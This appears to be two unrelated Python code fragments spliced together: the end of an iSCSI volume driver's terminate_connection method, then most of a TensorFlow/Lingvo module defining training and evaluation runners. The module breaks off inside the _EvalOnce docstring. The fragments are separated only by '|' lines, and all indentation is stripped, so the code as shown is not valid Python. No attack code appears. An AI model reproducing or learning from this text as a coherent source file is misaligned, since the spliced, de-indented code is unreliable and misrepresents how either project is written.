"""Cleanup after an iSCSI connection has been terminated.
When we clean up a terminated connection between a given connector
and volume, we:
1. Translate the given connector to a host name
2. Remove the volume-to-host mapping if it exists
3. Delete the host if it has no more mappings (hosts are created
automatically by this driver when mappings are created)
"""
LOG.debug('enter: terminate_connection: volume %(vol)s with connector'
' %(conn)s', {'vol': volume['id'], 'conn': connector})
vol_name = volume['name']
info = {}
if 'host' in connector:
# get host according to iSCSI protocol
info = {'driver_volume_type': 'iscsi',
'data': {}}
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
msg = (_('terminate_connection: Failed to get host name from'
' connector.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
# See bug #1244257
host_name = None
# Unmap volumes, if hostname is None, need to get value from vdiskmap
host_name = self._helpers.unmap_vol_from_host(vol_name, host_name)
# Host_name could be none
if host_name:
resp = self._helpers.check_host_mapped_vols(host_name)
if not len(resp):
self._helpers.delete_host(host_name)
LOG.debug('leave: terminate_connection: volume %(vol)s with '
'connector %(conn)s', {'vol': volume['id'],
'conn': connector})
return info
|
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph based runners."""
import contextlib
import os
import re
import threading
import time
from absl import flags
from lingvo import pdb_wrapper
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import metrics
from lingvo.core import py_utils
from lingvo.core import summary_utils
from lingvo.core import tpu_embedding_layers
import numpy as np
from lingvo import base_runner
from google.protobuf import text_format
# pylint:disable=g-direct-tensorflow-import
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
FLAGS = flags.FLAGS
# useful for debugging.
def StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if py_utils.IsEagerMode():
raise RuntimeError('The controller job is not supported in eager mode.')
self._job_name = 'controller'
assert not self._model_task_name, 'Controller needs all tasks!'
self._control_dir = os.path.join(self._logdir, 'control')
tf.io.gfile.makedirs(self._control_dir)
self._checkpoint_in_controller = True
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpoint_in_controller = False
if self._early_stop:
tf.logging.warning('Controller ignoring early_stop since '
'TrainerTpu is driving training.')
self._early_stop = None
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
if self._checkpoint_in_controller:
self._checkpointer = self._CreateCheckpointer(
self._train_dir,
self._model,
init_op=self._initialize_global_vars)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = summary_utils.ModelAnalysis(
self._model, FLAGS.inspect_model_topn, FLAGS.inspect_model_part_regex)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
self._WriteToLog(
text_format.MessageToString(self.params.ToProto(), as_utf8=True),
self._control_dir, 'params.pbtxt')
self._summary_writer.add_graph(self._graph)
def Start(self):
super().Start()
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
with tf.container(self._container_id), self._GetSession() as sess:
if FLAGS.interactive:
# Into interactive debugging mode.
StartShell(locals())
return
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
for task in self._model.tasks:
task.input.Initialize(sess)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
summary_interval_steps = tp.summary_interval_steps
save_interval_seconds = tp.save_interval_seconds
next_summary_step = 1
if not self._checkpoint_in_controller:
global_step = self._WaitUntilInit(sess)
while True:
now = time.time()
next_iteration_seconds = now + min(
10, save_interval_seconds) # 10 seconds or less
if self._checkpoint_in_controller:
# Init/restore variable if needed.
self._checkpointer.RestoreIfNeeded(sess)
global_step = sess.run(self._model.global_step)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
if self._checkpoint_in_controller:
self._checkpointer.Save(sess, global_step)
sess.close()
self._DequeueThreadComplete()
return
if self._checkpoint_in_controller:
# Checkpoint if it's time.
self._checkpointer.MaybeSave(sess, global_step)
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
global_step, summary_str = sess.run(
[self._model.global_step, self._summary_op])
next_summary_step = global_step + summary_interval_steps
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
tf.logging.info('Write summary @%s', global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
tf.logging.info('Write summary done: step %d', global_step)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _SummarizeValue(self, step, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), step)
class Trainer(base_runner.BaseRunner):
"""Trainer on non-TPU."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'trainer'
with self._graph.as_default(), tf.container(self._container_id):
try:
self._task_probs_summary_writers = []
for task in self._model.task_schedule.tasks:
path = os.path.join(os.path.join(self._train_dir, task))
tf.io.gfile.makedirs(path)
self._task_probs_summary_writers.append(
self._CreateSummaryWriter(path))
except AttributeError:
tf.logging.info('AttributeError. Expected for single task models.')
self._task_probs_summary_writers = []
if self.params.cluster.task == 0:
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
self._CreateTF2SummaryWriter(self._train_dir)
else:
self._summary_writer = None
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._CreateTF2SummaryOps()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
self._step_rate_tracker = summary_utils.StepRateTracker()
if self.params.cluster.task == 0:
self._WriteToLog(self.params.ToText(), self._train_dir,
'trainer_params.txt')
worker_id = self.params.cluster.task
self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
self.params.train.start_up_delay_steps)
def _SummarizeValue(self, steps, tag, value, writer=None):
if writer:
writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
elif self._summary_writer:
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def Start(self):
super().Start()
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
return super()._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
for task in self._model.tasks:
task.input.Initialize(sess)
global_step = self._WaitUntilInit(sess, self._start_up_delay_steps)
status_interval_steps = 100
next_status_step = 1
eval_metrics = None
while True:
if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
self._ShouldStop(sess, global_step)):
tf.logging.info('Training finished.')
if self._early_stop:
time.sleep(300) # controller hangs if it doesn't finish first
self._DequeueThreadComplete()
return
# If a task is explicitly specified, only train that task.
if self._model_task_name:
task = self._model.GetTask(self._model_task_name)
else:
# Note: This is a slightly stale global_step value from the previous
# sess.run() call.
# For multi-task models, `self._model.task_schedule.cur_probs` will
# be updated.
task = self._model.SampleTask(global_step)
if self._task_probs_summary_writers:
for index, prob in enumerate(self._model.task_schedule.cur_probs):
self._SummarizeValue(global_step, 'task_probability', prob,
self._task_probs_summary_writers[index])
try:
for index, task in enumerate(self._model.tasks):
self._SummarizeValue(global_step, 'task_weight',
sess.run(task.vars.task_weight),
self._task_probs_summary_writers[index])
except AttributeError:
pass
(_, eval_metrics, per_example_tensors) = sess.run([
task.train_op,
task.eval_metrics,
task.per_example_tensors,
])
# Explicitly fetch global_step after running train_op.
# TODO(b/151181934): Investigate this behavior further.
task_global_step = sess.run(task.global_step)
task.ProcessFPropResults(sess, task_global_step, eval_metrics,
per_example_tensors)
self._RunTF2SummaryOps(sess)
global_step = sess.run(self._model.global_step)
step_rate, example_rate, total_examples = (
self._step_rate_tracker.ComputeStepRate(
global_step, eval_metrics['num_samples_in_batch'][0]))
self._SummarizeValue(global_step, 'global_step/sec', step_rate)
self._SummarizeValue(global_step, 'examples/sec', example_rate)
self._SummarizeValue(global_step, 'total_samples', total_examples)
msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
global_step, step_rate, example_rate)
for key, (val, _) in sorted(eval_metrics.items()):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
if global_step >= next_status_step:
self._SetStatusMessage(msg)
self._ExportMetrics(
# Metrics expects python int, but global_step is numpy.int64.
global_step=int(global_step),
step_rate=step_rate,
example_rate=example_rate)
next_status_step = global_step + status_interval_steps
else:
tf.logging.info(msg)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if py_utils.IsEagerMode():
raise RuntimeError('TrainerTpu is not supported in eager mode. '
'Please run with --use_executor '
'(or --job=executor_tpu if running locally).')
self._job_name = 'trainer_tpu'
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._step_rate_tracker = summary_utils.StepRateTracker()
self._compile_op = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitUntilInitTpu():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
if self.params.train.tpu_computation_shape is None:
computation_shape = py_utils.ComputationShape(num_devices_per_split,
topology)
else:
computation_shape = self.params.train.tpu_computation_shape
assert num_devices_per_split == np.prod(computation_shape)
if self.params.train.tpu_device_order_mode is None:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism)
else:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism,
device_order_mode=self.params.train.tpu_device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitUntilInitTpu()
with self._graph.as_default(), tf.container(
self._container_id), contextlib.ExitStack() as stack:
if FLAGS.pdb_on_exception:
stack.enter_context(pdb_wrapper.catch_post_mortem())
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
self._CreateTF2SummaryWriter(self._train_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._task = self._model.GetTask()
self._task.input.InfeedSetupGraph()
self._eval_metrics = metrics.TpuEvalMetrics()
# Needed due to the AddExtraTheta() reference to global_step when
# instantiating the InputGenerator.
_ = py_utils.GetOrCreateGlobalStepVar()
self._CreateTF2SummaryOps()
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model.ConstructFPropBPropGraph()
tpu_embedding_collection = (
tpu_embedding_layers.TpuEmbeddingCollection.Get())
self._load_ops = tpu_embedding_collection.load_ops
self._retrieve_ops = tpu_embedding_collection.retrieve_ops
self._tpu_embedding = tpu_embedding_collection.tpu_embedding
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._task.eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(self._task.per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._task.train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
self._compile_op, batch_parallel_res = tpu.split_compile_and_shard(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._task.per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
def _ConstructPostTrainingLoop(train_loop_op, outfeed_dequeue_op):
"""Returns the op for tpu training with tail cpu computation."""
# Adds a tail computation that is run after the tpu_training loop
# step finishes. This allows us to run certain computation that
# acts on the variable between tpu_train_loop iterations and
# amortizing the cost of the operations. Alternative of running
# tpu.outside_compilation & using tf.cond is expensive.
with tf.control_dependencies(train_loop_op):
self._model.ConstructPostTrainingLoop(outfeed_dequeue_op)
with tf.control_dependencies([self._task.post_training_loop_op]):
return ([[tf.identity(o) for o in train_loop_op],
outfeed_dequeue_op])
# Get metric result from a single replica; they are all same here.
all_tpu_ops = [t[0] for t in batch_parallel_res]
self._tpu_train_ops = (
_ConstructPostTrainingLoop(all_tpu_ops, outfeed_dequeue_op))
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self._initialize_tables = tf.tables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpointer = checkpointer.Checkpointer(
self._train_dir, self._model, init_op=self._initialize_global_vars)
self.enqueue_ops = self._task.input.tpu_infeed_op
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
if self._task.input.input_data_summary_layout is not None:
self._summary_writer.add_summary(
self._task.input.input_data_summary_layout)
if FLAGS.checkpoint_in_trainer_tpu:
self._model_analysis, self._total_num_params = (
summary_utils.ModelAnalysis(self._model, FLAGS.inspect_model_topn,
FLAGS.inspect_model_part_regex))
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._train_dir,
'model_analysis.txt')
# Saves the trainer params.
self._WriteToLog(self.params.ToText(), self._train_dir,
'trainer_params.txt')
def _GetSession(self, **kwargs):
return super()._GetSession(cluster_def=self._worker_cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
for replica in range(device_assignment.num_replicas):
for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tpu_ops.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = []
for i in range(len(tensor_shapes)):
output_arrays.append(
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]))
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def _CleanUp(self):
# If there's an exception, we want _LoopEnqueue to wait until
# everything is initialized before starting up.
self._initialized.clear()
def Start(self):
super().Start()
# Run training.
self._RunLoop('trainer', self._Loop, cleanup_func=self._CleanUp)
def _InfeedLoop(self, sess):
tf.logging.info('_InfeedLoop start')
for _ in range(self._steps_per_loop):
sess.run(self.enqueue_ops)
def StartEnqueueOp(self, op):
# When retrieve ops for TPU embedding is present, we use _InfeedLoop above
# instead to make sure enqueue and retrieve does not happen at the same
# time as required by TPU embedding.
# We can remove this by using a tf.while_loop driven infeed op.
if self._retrieve_ops:
return
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
tf.logging.info('_LoopEnqueue waiting for _initialized...')
self._initialized.wait()
tf.logging.info('_LoopEnqueue proceeding.')
# The global step may not be initialized in this thread if the target server
# uses session state isolation (e.g. Cloud TPUs).
sess = self._GetSession()
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpointer.RestoreGlobalStepIfNeeded(sess)
# Get merged summary op for training related input data stats from the
# tasks's input generator.
self._merged_input_data_summary_op = (
self._task.input.merged_input_data_summary_op)
return super()._LoopEnqueue(op, sess)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
self._DequeueThreadComplete()
return
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
config_proto = (
self._tpu_embedding.config_proto
if self._tpu_embedding is not None else None)
sess.run(
tf.tpu.initialize_system(embedding_config=config_proto, job=None))
sess.run(self._initialize_tables)
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
if FLAGS.run_locally == 'tpu':
sess.run(self._initialize_global_vars)
self._SetStatusMessage('Compiling ...')
compilation_result = sess.run(self._compile_op)
comp_result_proto = tpu_compilation_result.CompilationResultProto()
comp_result_proto.ParseFromString(compilation_result)
if comp_result_proto.status_error_message:
tf.logging.fatal('Compilation failed: {}'.format(
comp_result_proto.status_error_message))
self._SetStatusMessage('Compiling done.')
if FLAGS.checkpoint_in_trainer_tpu:
# For b/134415393 -- better to initialize to a known state than
# rely on what's in the session on the trainer/TPU worker.
tf.logging.info('TrainerTpu: Force restore or initialize.')
self._checkpointer.Restore(sess, force_reinitialize=True)
global_step = sess.run(self._model.global_step)
self._initialized.set()
eval_metrics = None
if FLAGS.checkpoint_in_trainer_tpu and global_step == 0:
# Always save a ckpt at step 0.
self._checkpointer.MaybeSave(sess, global_step)
sess.run(self._load_ops)
while True:
train_steps_start = time.perf_counter()
if FLAGS.checkpoint_in_trainer_tpu:
# Init/restore variable if needed.
self._checkpointer.RestoreIfNeeded(sess)
if self._trial.ShouldStopAndMaybeReport(
global_step, eval_metrics) or self._ShouldEarlyStop(sess):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well. Otherwise, the enqueue thread may be stuck, e.g.,
# when the queue is filled and the enqueue thread is blocked when
# pushing new data to the queue, if the trainer thread decides to
# early stop (i.e., `self._ShouldEarlyStop(sess)` is true), then the
# enqueue thread could be blocked forever as the trainer thread would
# never consume any new data from the queue. After setting the new
# max step horizon, the trainer thread would continue run for 3 loops
# (3K global steps usually), so the enqueue thread could get a chance
# to move forward and run `_ShouldStop()` to stop gracefully.
# Updated this to account for `tpu_infeed_parallelism` which could
# allow for more enqueue threads to get further ahead of the traiiner
# thread.
if self._max_steps_for_early_stop is None:
tpu_infeed_parallelism = self._task.input.params.tpu_infeed_parallelism
self._max_steps_for_early_stop = global_step + 3 * tpu_infeed_parallelism * self._steps_per_loop
tf.logging.info('Early stopping at step: %d',
self._max_steps_for_early_stop)
if self._ShouldStop(sess, global_step, check_early_stop=False):
tf.logging.info('Training finished.')
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpointer.Save(sess, global_step)
self._DequeueThreadComplete()
return
if self._retrieve_ops:
infeed_loop_thread = threading.Thread(
target=self._InfeedLoop, args=(sess,))
infeed_loop_thread.start()
tpu_train_op_start = time.perf_counter()
values, outfeeds = sess.run(self._tpu_train_ops)
tpu_train_op_secs = time.perf_counter() - tpu_train_op_start
if self._retrieve_ops:
infeed_loop_thread.join()
tf.logging.info('Retrieve params.')
sess.run(self._retrieve_ops)
tf.logging.info('Retrieve params done.')
self._eval_metrics.PackMetricsValues(values)
eval_metrics = self._eval_metrics.metrics
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
task_global_step = sess.run(self._task.global_step)
global_step = sess.run(self._model.global_step)
if not self._task.per_example_tensors:
outfeeds = {}
self._task.ProcessFPropResults(sess, task_global_step, eval_metrics,
outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
step_rate, example_rate, total_examples = (
self._step_rate_tracker.ComputeStepRate(
global_step,
eval_metrics['num_samples_in_batch'][0] * self._steps_per_loop))
self._RunTF2SummaryOps(sess)
self._SummarizeValue(global_step, 'global_step/sec', step_rate)
self._SummarizeValue(global_step, 'examples/sec', example_rate)
self._SummarizeValue(global_step, 'total_samples', total_examples)
if FLAGS.checkpoint_in_trainer_tpu:
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
global_step, step_rate, example_rate)
for key, (val, _) in sorted(eval_metrics.items()):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
# Add model eval metrics to early stop metric history.
for metric_name, (metric_value, _) in eval_metrics.items():
self._UpdateEarlyStopMetric('train', global_step, metric_name,
metric_value)
checkpoint_write_secs = 0.0
if FLAGS.checkpoint_in_trainer_tpu:
checkpoint_write_start = time.perf_counter()
checkpoint_saved = self._checkpointer.MaybeSave(sess, global_step)
if checkpoint_saved:
checkpoint_write_secs = time.perf_counter() - checkpoint_write_start
train_steps_secs = time.perf_counter() - train_steps_start
self._ExportMetrics(
# Metrics expects python int, but global_step is numpy.int64.
global_step=int(global_step),
step_rate=step_rate,
example_rate=example_rate,
tpu_train_op_secs=tpu_train_op_secs,
checkpoint_write_secs=checkpoint_write_secs,
total_train_steps_secs=train_steps_secs,
**{k: v[0] for k, v in eval_metrics.items()})
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self._export = eval_type == 'train'
if not self._export:
tf.logging.info(f'Job {self._job_name} will not export the model.')
self.params.cluster.do_eval = True
self._cluster = cluster_factory.Cluster(self.params.cluster)
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.io.gfile.makedirs(self._eval_dir)
self._eval_path = None
# Multitask params doesn't have 'task'.
if 'task' in self.params:
self._eval_path = checkpointer.GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._should_report_metrics = self._job_name.startswith(
self._cluster.reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._CreateTF2SummaryWriter(self._eval_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropGraph()
self._task = self._model.GetTask(self._model_task_name)
self._checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._CreateTF2SummaryOps()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.io.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def Start(self):
super().Start()
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
self._task.input.Initialize(sess)
if self._eval_path:
self._EvalOnce(sess, self._eval_path)
self._UpdateProcessedCheckpoints(self._eval_dir, self._eval_path)
elif self._task.params.eval.eval_all_checkpoints:
self._RunOnAllCheckpoints(sess, self._EvalOnce, self._eval_dir)
else:
self._RunOnLatestCheckpoints(sess, self._EvalOnce, self._eval_dir)
if self._should_report_metrics:
tf.logging.info('Reporting trial done.')
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(sess, path)
def EvalCheckpoint(self, ckpt_id):
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = '{}/ckpt-{:08d}'.format(self._train_dir, ckpt_id)
self._EvalOnce(sess, path)
def _RemoveScalarSummaries(self, summaries):
proto = summary_pb2.Summary()
proto.ParseFromString(summaries)
for i, value in enumerate(proto.value):
if value.WhichOneof('value') == 'simple_value':
del proto.value[i]
return proto.SerializeToString()
def _EvalOnce(self, sess, path):
"""Runs evaluation for a batch of samples.
Args:
sess: the tf Session.
path: checkpoint path.
"""
